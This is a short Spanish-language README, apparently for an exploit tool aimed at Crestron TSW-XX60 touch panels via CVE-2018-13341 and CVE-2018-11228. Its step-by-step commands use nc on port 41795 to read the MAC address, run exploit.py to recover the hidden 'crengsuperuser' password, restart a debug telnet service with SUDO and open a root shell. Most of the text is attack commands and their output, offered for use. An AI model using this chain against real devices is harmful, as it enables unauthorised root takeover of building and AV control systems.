
Esta herramienta tiene como objetivo explotar el CVE-2018-13341
Esta herramienta tiene como objetivo explotar el CVE-2018-13341. Usando la dirección MAC del dispositivo objetivo, se puede recuperar la contraseña de la cuenta oculta "crengsuperuser", que tiene privilegios elevados y permite ejecutar comandos SUDO.
El Protocolo de la Caja de Herramientas Crestron (CTP) se puede conectar accediendo al puerto 41795 en el dispositivo TSW-XX60.
# nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> estat
The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
Link Status ....... : OK
DHCP .............. : ON
MAC Address ....... : 00.XX.XX.XX.XX.XX
IP Address ........ : [removed]
Subnet Mask ....... : [removed]
IPV6 Address ...... : [removed]
Default Gateway ... : [removed]
DNS Servers ........ : [removed] | DHCP |
[removed] | DHCP |
Esta herramienta requiere el módulo CryptoGraphy.
# pip3 install cryptography
O
# pip3 install -r requirements.txt
usage: exploit.py [-h] [-m MAC]
# Ejemplo
# python3 exploit.py -m aabbccddeeff
[*] Dirección MAC del dispositivo: AAXXYYZZ
[*] Contraseña para 'crengsuperuser': somerandompass
El CVE-2018-11228 permite RCE no autenticada a través del Servicio de Shell Bash en el Protocolo de Terminal Crestron (CTP). Después de obtener la contraseña de la cuenta oculta "crengsuperuser", se puede obtener acceso root en la máquina.
# nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************
Service telnetd_debug restarted
TSW-760>
Luego, en una nueva shell, se puede obtener acceso root en la caja.
# telnet w.x.y.z
bash# whoami
root
Créditos para: axcheron